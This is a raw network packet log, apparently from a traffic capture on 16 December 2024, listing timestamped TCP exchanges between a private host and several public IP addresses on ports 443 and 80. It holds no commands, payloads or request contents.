                                                                                                                                                                          Dec 16, 2024 16:33:24.829054117 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.829067945 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.829124928 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.834312916 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.834398985 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.834460020 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.834652901 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.840881109 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.840966940 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.840980053 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.841044903 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.847626925 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.847721100 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.847733021 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.847812891 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.850019932 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.850104094 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.850162983 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.850220919 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.854101896 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.854202032 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.854224920 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.854286909 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.858462095 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.858578920 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.858616114 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.858673096 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.862715006 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.862811089 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.862832069 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.862895012 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.867089033 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.867177010 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.867196083 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.867257118 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.871448040 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.871527910 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.871532917 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.871578932 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.875499964 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.875582933 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.876153946 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.876215935 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.880125999 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.880196095 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.880237103 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.880287886 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.886817932 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.886908054 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.886931896 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.886987925 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.889811039 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.889890909 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.889947891 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.890005112 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.895565987 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.895679951 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.895725012 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.895788908 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.898919106 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.898989916 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.899033070 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.899084091 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.904721022 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.904782057 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.904851913 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.904901981 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.908058882 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.908119917 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.908194065 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.908243895 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.914155960 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.914272070 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.914288998 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.914346933 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.917195082 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.917263985 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.917278051 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.917339087 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.923283100 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.923386097 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.923398018 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.923470020 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.925756931 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.925877094 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.926306963 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.926371098 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.926383018 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.926436901 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.931792974 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.931862116 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.931874037 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.931932926 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.934662104 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.934730053 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.934775114 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.934834957 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.940026045 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.940098047 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.940140009 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.940188885 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.943062067 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.943133116 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.943170071 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.943228960 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.948863983 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.948930025 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.948975086 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.949033976 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.951239109 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.951340914 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.951364994 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.951422930 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.955044031 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.955112934 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.955125093 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.955178022 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.958992004 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.959075928 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.959088087 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.959148884 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.962843895 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.962915897 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.962928057 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.962991953 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.966850042 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.966933966 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.966984034 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.967044115 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.970443964 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.970505953 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.970557928 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.970614910 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.974214077 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.974288940 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.974406004 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.974457979 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.977859974 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.977922916 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.977952003 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.978003025 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.981705904 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.981776953 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.981801033 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.981854916 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.985214949 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.985277891 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.985325098 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.985378981 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.989025116 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.989109039 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.989137888 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.989192009 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.992377996 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.992469072 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.992515087 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.992574930 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.995515108 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.995590925 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.995604992 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.995668888 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.998914003 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.998991966 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.999034882 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.999087095 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.001689911 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.001754045 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.001791000 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.001848936 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.004848957 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.004915953 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.004970074 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.005017042 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.007838964 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.007895947 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.007949114 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.008013964 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.010957003 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.011023045 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.011131048 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.011183023 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.013906956 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.013962984 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.014023066 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.014084101 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.014410019 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.014452934 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.016993999 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.017040014 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.017427921 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.017473936 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.020472050 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.020515919 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.020730019 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.020772934 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.026489019 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.026542902 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.026710033 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.026757956 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.026834011 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.026874065 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.027798891 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.027853966 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.036628008 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.036679983 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.037054062 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.037096977 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.037164927 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.037205935 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.038201094 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.038247108 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.038321018 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.038362026 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.039304972 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.039345026 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.039356947 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.039386988 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.039400101 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.039411068 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:25.385516882 CET4980080192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:25.505780935 CET8049800193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:25.506200075 CET4980080192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:25.506360054 CET4980080192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:25.626385927 CET8049800193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:26.778592110 CET8049800193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:26.784601927 CET4980080192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:26.906301975 CET8049800193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:27.192281008 CET8049800193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:27.235984087 CET4980080192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:28.033638954 CET49806443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:28.033689022 CET44349806104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:28.033781052 CET49806443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:28.035834074 CET49806443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:28.035861969 CET44349806104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:29.267210960 CET44349806104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:29.267354012 CET49806443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:29.271286964 CET49806443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:29.271337032 CET44349806104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:29.271792889 CET44349806104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:29.274758101 CET49806443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:29.315334082 CET44349806104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:29.709625959 CET44349806104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:29.709808111 CET44349806104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:29.709902048 CET49806443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:29.714881897 CET49806443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:29.720519066 CET4980080192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:29.840368032 CET8049800193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:30.131134033 CET8049800193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:30.132982016 CET49812443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:30.133021116 CET44349812104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:30.133100986 CET49812443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:30.133371115 CET49812443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:30.133385897 CET44349812104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:30.173512936 CET4980080192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:31.353105068 CET44349812104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:31.354918957 CET49812443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:31.354948997 CET44349812104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:31.824784994 CET44349812104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:31.824943066 CET44349812104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:31.825002909 CET49812443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:31.825368881 CET49812443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:31.828421116 CET4980080192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:31.829504013 CET4981880192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:31.948549986 CET8049800193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:31.948693991 CET4980080192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:31.949251890 CET8049818193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:31.949336052 CET4981880192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:31.949470043 CET4981880192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:32.069197893 CET8049818193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:33.218835115 CET8049818193.122.6.168192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:33.220356941 CET49824443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:33.220386982 CET44349824104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:33.220566034 CET49824443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:33.220813036 CET49824443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:33.220822096 CET44349824104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:33.267532110 CET4981880192.168.2.4193.122.6.168
                                                                                                                                                                          Dec 16, 2024 16:33:34.452958107 CET44349824104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:34.455116987 CET49824443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:34.455146074 CET44349824104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:34.921596050 CET44349824104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:34.921797037 CET44349824104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:34.921876907 CET49824443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:34.922250986 CET49824443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:35.101102114 CET4982880192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:35.223218918 CET8049828158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:35.223304033 CET4982880192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:35.223452091 CET4982880192.168.2.4158.101.44.242
                                                                                                                                                                          Dec 16, 2024 16:33:35.344832897 CET8049828158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:36.447566032 CET8049828158.101.44.242192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:36.448894024 CET49831443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:36.448985100 CET44349831104.21.67.152192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:36.449120045 CET49831443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:36.449379921 CET49831443192.168.2.4104.21.67.152
                                                                                                                                                                          Dec 16, 2024 16:33:36.449415922 CET44349831104.21.67.152192.168.2.4
